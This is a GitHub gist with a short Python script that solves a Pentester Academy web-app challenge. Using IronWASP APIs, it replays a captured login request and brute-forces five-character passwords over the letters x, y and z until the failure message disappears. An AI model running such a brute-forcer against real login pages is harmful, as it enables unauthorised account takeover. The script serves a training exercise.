Last active
May 24, 2016 22:58
-
-
Save Lavakumar/7181444 to your computer and use it in GitHub Desktop.
Python script written using IronWASP APIs to solve Pentester Academy's WAP Challenge -1.
Link to challenge - http://www.pentesteracademy.com/video?id=153
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Script to help solve http://www.pentesteracademy.com/video?id=153 | |
#This script can be run from the multi-line scripting shell of IronWASP v0.9.7.2 and above | |
#Make sure the scripting shell language is selected as Python before executing | |
#The log id value here is one 1. The id value must point to the log containing the login request | |
r = Request.FromProxyLog(1) | |
r.Query.Set("email", "jack@pentesteracademy.com") | |
bf = BruteForcer("xyz", 5,5) | |
while bf.HasMore(): | |
password = bf.GetNext() | |
r.Query.Set("password", password) | |
res = r.Send() | |
if res.BodyString.count("Failed! Please try again!") == 0: | |
print "Password is - " + password | |
break | |
else: | |
print password |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
hey